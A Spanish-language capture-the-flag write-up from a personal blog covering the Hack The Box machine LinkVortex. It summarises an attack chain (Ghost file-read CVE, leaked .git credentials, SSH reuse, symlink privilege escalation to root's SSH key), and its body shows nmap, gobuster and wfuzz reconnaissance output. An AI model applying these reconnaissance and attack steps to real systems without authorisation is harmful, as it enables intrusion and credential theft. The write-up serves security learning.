<!DOCTYPE html><html lang="es-ES" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Writeup LinkVortex HTB" /><meta name="author" content="rabb1t" /><meta property="og:locale" content="es_ES" /><meta name="description" content="Esta máquina cuenta con un servicio web sencillo el cual debemos enumerar para identificar un directorio que contiene un servicio de bloggeo (Ghost), la cual a su vez tiene una vulnerabilidad Local File Inclusión que requiere autenticación. Enumeramos subdominios e identificamos uno nuevo en el cual también debemos enumerar directorios, obteniendo un recurso de Git donde podemos extraer todos los objetos. Dentro de este recurso identificamos credenciales para el usuario administrador de Ghost con las cuales, podemos ejecutar un exploit que nos permita leer archivos internos de la máquina víctima. Usando la vulnerabilidad LFI identificamos un usuario llamado Bob que está asociado a SSH, y reutilizando las credenciales del usuario administrador en el sitio Ghost, procedemos a iniciar sesión por SSH con este último usuario. Para escalar privilegios contamos con los permisos para ejecutar un script como root. El script comprueba enlaces simbólico y si apunta a rutas críticas como “/etc” o “/root”. Nos aprovechamos de esto ya que manipulando enlaces simbólicos y genenando un bypass, logramos leer archivos sensibles como la id_rsa del usuario root." /><meta property="og:description" content="Esta máquina cuenta con un servicio web sencillo el cual debemos enumerar para identificar un directorio que contiene un servicio de bloggeo (Ghost), la cual a su vez tiene una vulnerabilidad Local File Inclusión que requiere autenticación. Enumeramos subdominios e identificamos uno nuevo en el cual también debemos enumerar directorios, obteniendo un recurso de Git donde podemos extraer todos los objetos. Dentro de este recurso identificamos credenciales para el usuario administrador de Ghost con las cuales, podemos ejecutar un exploit que nos permita leer archivos internos de la máquina víctima. Usando la vulnerabilidad LFI identificamos un usuario llamado Bob que está asociado a SSH, y reutilizando las credenciales del usuario administrador en el sitio Ghost, procedemos a iniciar sesión por SSH con este último usuario. Para escalar privilegios contamos con los permisos para ejecutar un script como root. El script comprueba enlaces simbólico y si apunta a rutas críticas como “/etc” o “/root”. Nos aprovechamos de esto ya que manipulando enlaces simbólicos y genenando un bypass, logramos leer archivos sensibles como la id_rsa del usuario root." /><link rel="canonical" href="https://rabb1t-0.github.io/posts/WriteUp-LinkVortex-HTB/" /><meta property="og:url" content="https://rabb1t-0.github.io/posts/WriteUp-LinkVortex-HTB/" /><meta property="og:site_name" content="rabb1t" /><meta property="og:image" content="https://labs.hackthebox.com/storage/avatars/97f12db8fafed028448e29e30be7efac.png" /><meta property="og:image:height" content="180" /><meta property="og:image:width" content="180" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2025-04-12T00:00:00-05:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://labs.hackthebox.com/storage/avatars/97f12db8fafed028448e29e30be7efac.png" /><meta property="twitter:title" content="Writeup LinkVortex HTB" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"rabb1t"},"dateModified":"2025-04-12T14:31:28-05:00","datePublished":"2025-04-12T00:00:00-05:00","description":"Esta máquina cuenta con un servicio web sencillo el cual debemos enumerar para identificar un directorio que contiene un servicio de bloggeo (Ghost), la cual a su vez tiene una vulnerabilidad Local File Inclusión que requiere autenticación. Enumeramos subdominios e identificamos uno nuevo en el cual también debemos enumerar directorios, obteniendo un recurso de Git donde podemos extraer todos los objetos. Dentro de este recurso identificamos credenciales para el usuario administrador de Ghost con las cuales, podemos ejecutar un exploit que nos permita leer archivos internos de la máquina víctima. Usando la vulnerabilidad LFI identificamos un usuario llamado Bob que está asociado a SSH, y reutilizando las credenciales del usuario administrador en el sitio Ghost, procedemos a iniciar sesión por SSH con este último usuario. Para escalar privilegios contamos con los permisos para ejecutar un script como root. El script comprueba enlaces simbólico y si apunta a rutas críticas como “/etc” o “/root”. Nos aprovechamos de esto ya que manipulando enlaces simbólicos y genenando un bypass, logramos leer archivos sensibles como la id_rsa del usuario root.","headline":"Writeup LinkVortex HTB","image":{"width":180,"height":180,"url":"https://labs.hackthebox.com/storage/avatars/97f12db8fafed028448e29e30be7efac.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://rabb1t-0.github.io/posts/WriteUp-LinkVortex-HTB/"},"url":"https://rabb1t-0.github.io/posts/WriteUp-LinkVortex-HTB/"}</script><title>Writeup LinkVortex HTB | rabb1t</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/favicon/rbit.jpg"><link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon/rbit.jpg"><link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon/rbit.jpg"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/favicon/rbit.ico"><meta name="apple-mobile-web-app-title" content="rabb1t"><meta name="application-name" content="rabb1t"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto glitch"><div class="glitch__item"></div><div class="glitch__item"></div><div class="glitch__item"></div><div class="glitch__item"></div><div class="glitch__item"></div></a></div><div class="site-title mt-3"> <a href="/">rabb1t</a></div><div class="site-subtitle font-italic">Blog personal, CTFS, artículos de ciberseguridad y más.</div></div><ul class="w-100"><li class="nav-item"> <a href="/blog" class="nav-link cybr-btn"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> INICIO <span class='cybr-btn__glitch' aria-hidden=''>INICIO</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link cybr-btn"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> CATEGORÍAS <span aria-hidden class="cybr-btn__glitch">CATEGORÍAS </span> </a><li class="nav-item"> <a href="/tags/" class="nav-link cybr-btn"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> ETIQUETAS <span aria-hidden class="cybr-btn__glitch">ETIQUETAS </span> </a><li class="nav-item"> <a href="/archives/" class="nav-link cybr-btn"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> ARCHIVO <span aria-hidden class="cybr-btn__glitch">ARCHIVO </span> </a><li class="nav-item"> <a href="/about/" class="nav-link cybr-btn"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> ACERCA DE <span aria-hidden class="cybr-btn__glitch">ACERCA DE </span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/rabb1t-0 " aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/rabb1t" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/blog"> Inicio </a> </span> <span>Writeup LinkVortex HTB</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Entrada</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Buscar..."> </span> <span id="search-cancel" >Cancelar</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 180 180'%3E%3C/svg%3E" data-src="https://labs.hackthebox.com/storage/avatars/97f12db8fafed028448e29e30be7efac.png" class="preview-img bg" alt="Preview Image" width="180" height="180" data-proofer-ignore><h1 data-toc-skip>Writeup LinkVortex HTB</h1><div class="post-meta text-muted"><div> Por <em> rabb1t </em></div><div class="d-flex"><div> <span> Publicado <em class="timeago" data-ts="1744434000" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2025-04-12 </em> </span> <span> Actualizado <em class="timeago" data-ts="1744486288" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2025-04-12 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="2976 palabras"> <em>16 min</em> de lectura</span></div></div></div><div class="post-content"><p>Esta máquina cuenta con un servicio web sencillo el cual debemos enumerar para identificar un directorio que contiene un servicio de bloggeo (Ghost), la cual a su vez tiene una vulnerabilidad Local File Inclusión que requiere autenticación. Enumeramos subdominios e identificamos uno nuevo en el cual también debemos enumerar directorios, obteniendo un recurso de Git donde podemos extraer todos los objetos. Dentro de este recurso identificamos credenciales para el usuario administrador de Ghost con las cuales, podemos ejecutar un exploit que nos permita leer archivos internos de la máquina víctima. Usando la vulnerabilidad LFI identificamos un usuario llamado Bob que está asociado a SSH, y reutilizando las credenciales del usuario administrador en el sitio Ghost, procedemos a iniciar sesión por SSH con este último usuario. Para escalar privilegios contamos con los permisos para ejecutar un script como root. El script comprueba enlaces simbólico y si apunta a rutas críticas como “/etc” o “/root”. Nos aprovechamos de esto ya que manipulando enlaces simbólicos y genenando un bypass, logramos leer archivos sensibles como la id_rsa del usuario root.</p><h2 id="índice"><span class="mr-2">Índice</span><a href="#índice" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><ul><li><a href="#máquina-linkvortex">Información básica de la máquina</a><li><a href="#herramientas-y-recursos-empleados">Herramientas y recursos empleados</a><li><a href="#enumeración">Enumeración</a><li><a href="#explotando-la-vulnerabilidad-lfi-en-el-ghost">Explotando la vulnerabilidad LFI en el Ghost</a><li><a href="#escalando-privilegios">Escalando privilegios</a><ul><li><a href="#analizando-código">Analizando código</a></ul></ul><h2 id="máquina-linkvortex"><span class="mr-2">Máquina linkvortex</span><a href="#máquina-linkvortex" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="table-wrapper"><table><thead><tr><th>IP<th>10.10.11.47<tbody><tr><td>OS<td>Linux<tr><td>Dificultad<td>Fácil<tr><td>Creador<td>0xyassine</table></div><h2 id="herramientas-y-recursos-empleados"><span class="mr-2">Herramientas y recursos empleados</span><a href="#herramientas-y-recursos-empleados" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><ul><li>Herramientas<ul><li>nmap<li>gobuster<li>wfuzz<li><a href="https://github.com/lijiejie/GitHack">GitHack.py</a></ul><li>Recursos<ul><li>SecLists</ul></ul><hr /><h2 id="enumeración"><span class="mr-2">Enumeración</span><a href="#enumeración" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Comenzamos realizando un escaneo con <code class="language-plaintext highlighter-rouge">nmap</code> a la máquina víctima:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre><span class="c"># Nmap 7.94SVN scan initiated Sun Apr  6 00:58:58 2025 as: nmap -p- -sCV -sS --min-rate 5000 -Pn --open -n -vvv -oN scope.txt 10.10.11.47</span>
Nmap scan report <span class="k">for </span>10.10.11.47
Host is up, received user-set <span class="o">(</span>0.48s latency<span class="o">)</span><span class="nb">.</span>
Scanned at 2025-04-06 00:58:59 EDT <span class="k">for </span>40s
Not shown: 53494 closed tcp ports <span class="o">(</span>reset<span class="o">)</span>, 12039 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span>
Some closed ports may be reported as filtered due to <span class="nt">--defeat-rst-ratelimit</span>
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb <span class="o">(</span>ECDSA<span class="o">)</span>
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA<span class="o">=</span>
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 <span class="o">(</span>ED25519<span class="o">)</span>
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63 Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Sun Apr  6 00:59:39 2025 -- 1 IP address (1 host up) scanned in 41.36 seconds</span>

</pre></table></code></div></div><p>En el escaneo, no obtenemos gran información más allá de los puertos abiertos, así que incluí el dominio <code class="language-plaintext highlighter-rouge">linkvortex.htb</code> en el archivo <code class="language-plaintext highlighter-rouge">/etc/hosts</code></p><p>Procedí a enumerar directorios en el servicio web con gobuster:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt <span class="nt">-t</span> 25 <span class="nt">-u</span> <span class="s1">'http://linkvortex.htb/'</span> <span class="nt">-f</span> <span class="nt">-r</span>
<span class="o">===============================================================</span>
Gobuster v3.6
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:                     http://linkvortex.htb/
<span class="o">[</span>+] Method:                  GET
<span class="o">[</span>+] Threads:                 25
<span class="o">[</span>+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
<span class="o">[</span>+] Negative Status codes:   404
<span class="o">[</span>+] User Agent:              gobuster/3.6
<span class="o">[</span>+] Add Slash:               <span class="nb">true</span>
<span class="o">[</span>+] Follow Redirect:         <span class="nb">true</span>
<span class="o">[</span>+] Timeout:                 10s
<span class="o">===============================================================</span>
Starting gobuster <span class="k">in </span>directory enumeration mode
<span class="o">===============================================================</span>
/about/               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 8284]
/rss/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 26682]
/feed/                <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 26682]
/About/               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 8284]
/RSS/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 26682]
/private/             <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 12148]
/unsubscribe/         <span class="o">(</span>Status: 400<span class="o">)</span> <span class="o">[</span>Size: 24]
/cpu/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15472]
/Rss/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 26682]
/ram/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 14746]
/ghost/               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 3787]
/psu/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15163]
/Private/             <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 12148]
/Feed/                <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 26682]
/Ghost/               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 3787]
/RAM/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 14746]
/vga/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15231]
/CPU/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15472]
/VGA/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15231]
/AMP/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 12148]
/ABOUT/               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 8284]
/47117/               <span class="o">(</span>Status: 502<span class="o">)</span> <span class="o">[</span>Size: 341]
/cmos/                <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 15489]
/server-status/       <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/Ram/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 14746]
/Unsubscribe/         <span class="o">(</span>Status: 400<span class="o">)</span> <span class="o">[</span>Size: 24]
/unSubscribe/         <span class="o">(</span>Status: 400<span class="o">)</span> <span class="o">[</span>Size: 24]
/amp/                 <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 12148]
Progress: 220559 / 220560 <span class="o">(</span>100.00%<span class="o">)</span>
<span class="o">===============================================================</span>
Finished
<span class="o">===============================================================</span>
</pre></table></code></div></div><p>Identifiqué el recurso <code class="language-plaintext highlighter-rouge">/ghost</code> el cual procedí a acceder desde el navegador. Además usé la extensión <code class="language-plaintext highlighter-rouge">Wappalyzer</code> para observar las tecnologías empleadas en el sitio.</p><p><img data-src="/assets/favicon/2025-04-12/linkvortex1.png" alt="Web linkvortex" data-proofer-ignore> <em>Figure 1. Identificación de tecnologías con Wappalyzer.</em></p><p>Podemos observar que nos enfrentamos a un CMS llamado “Ghost” que está en la versión 5.58</p><p>Así que procedí a buscar en internet algún exploit para esa versión de Ghost e identifiqué un Arbitrary File Read que requiere autenticación <a href="https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028/blob/master/CVE-2023-40028">CVE-2023-40028</a>.</p><p>Debido a que requiero autenticación para leer archivos del sistema, proseguí con la enumeración.</p><p>Anteriormente usé gobuster para identificar subdominios pero no me obtuve ninguno valido, así que procedí a hacerlo con <code class="language-plaintext highlighter-rouge">wfuzz</code>.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>wfuzz <span class="nt">-c</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt <span class="nt">-t</span> 10 <span class="nt">-H</span> <span class="s2">"Host:FUZZ.linkvortex.htb"</span> <span class="nt">--hc</span> 301 http://linkvortex.htb/
<span class="k">********************************************************</span>
<span class="k">*</span> Wfuzz 3.1.0 - The Web Fuzzer                         <span class="k">*</span>
<span class="k">********************************************************</span>

Target: http://linkvortex.htb/
Total requests: 114441

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       Payload                                                                                      
<span class="o">=====================================================================</span>

000000019:   200        115 L    255 W      2538 Ch     <span class="s2">"dev"</span>
000009532:   400        8 L      27 W       226 Ch      <span class="s2">"#www"</span>
000010581:   400        8 L      27 W       226 Ch      <span class="s2">"#mail"</span>
000047706:   400        8 L      27 W       226 Ch      <span class="s2">"#smtp"</span>                 
000103135:   400        8 L      27 W       226 Ch      <span class="s2">"#pop3"</span>                                                                                      
Total <span class="nb">time</span>: 0
Processed Requests: 114441
Filtered Requests: 114436
Requests/sec.: 0
</pre></table></code></div></div><p>Con esta herramienta, obtuve un nuevo subdominio valido, <code class="language-plaintext highlighter-rouge">dev.linkvortex.htb</code> el cual procedí a incluir en el archivo <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.</p><p>Ingresé desde el navegador a “http://dev.linkvortex.htb” y pude observar que el sitio no contenía nada más que una página avisando un pronto lanzamiento. <img data-src="/assets/favicon/2025-04-12/linkvortex2.png" alt="Web linkvortex" data-proofer-ignore> <em>Figure 2. Sitio en desarrollo.</em></p><p>Así que procedí a enumerar directorios y no hubo frutos…</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt <span class="nt">-t</span> 25 <span class="nt">-u</span> <span class="s1">'http://dev.linkvortex.htb/'</span> <span class="nt">-f</span> <span class="nt">-r</span>
<span class="o">===============================================================</span>
Gobuster v3.6
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:                     http://dev.linkvortex.htb/
<span class="o">[</span>+] Method:                  GET
<span class="o">[</span>+] Threads:                 25
<span class="o">[</span>+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
<span class="o">[</span>+] Negative Status codes:   404
<span class="o">[</span>+] User Agent:              gobuster/3.6
<span class="o">[</span>+] Add Slash:               <span class="nb">true</span>
<span class="o">[</span>+] Follow Redirect:         <span class="nb">true</span>
<span class="o">[</span>+] Timeout:                 10s
<span class="o">===============================================================</span>
Starting gobuster <span class="k">in </span>directory enumeration mode
<span class="o">===============================================================</span>
/cgi-bin/             <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/icons/               <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/server-status/       <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
Progress: 220559 / 220560 <span class="o">(</span>100.00%<span class="o">)</span>
<span class="o">===============================================================</span>
Finished
<span class="o">===============================================================</span>
</pre></table></code></div></div><p>También procedí a enumerar archivos o rutas comunes e identifiqué algo interesante.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/SecLists/Discovery/Web-Content/common.txt <span class="nt">-t</span> 25 <span class="nt">-u</span> <span class="s1">'http://dev.linkvortex.htb/'</span> <span class="nt">-f</span> <span class="nt">-r</span>
<span class="o">===============================================================</span>
Gobuster v3.6
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:                     http://dev.linkvortex.htb/
<span class="o">[</span>+] Method:                  GET
<span class="o">[</span>+] Threads:                 25
<span class="o">[</span>+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/common.txt
<span class="o">[</span>+] Negative Status codes:   404
<span class="o">[</span>+] User Agent:              gobuster/3.6
<span class="o">[</span>+] Add Slash:               <span class="nb">true</span>
<span class="o">[</span>+] Follow Redirect:         <span class="nb">true</span>
<span class="o">[</span>+] Timeout:                 10s
<span class="o">===============================================================</span>
Starting gobuster <span class="k">in </span>directory enumeration mode
<span class="o">===============================================================</span>
/.htaccess/           <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/.hta/                <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/.git/logs//          <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 868]
/.git/                <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 2796]
/.htpasswd/           <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/cgi-bin/             <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/cgi-bin//            <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/icons/               <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
/server-status/       <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 199]
Progress: 4734 / 4735 <span class="o">(</span>99.98%<span class="o">)</span>
<span class="o">===============================================================</span>
Finished
<span class="o">===============================================================</span>
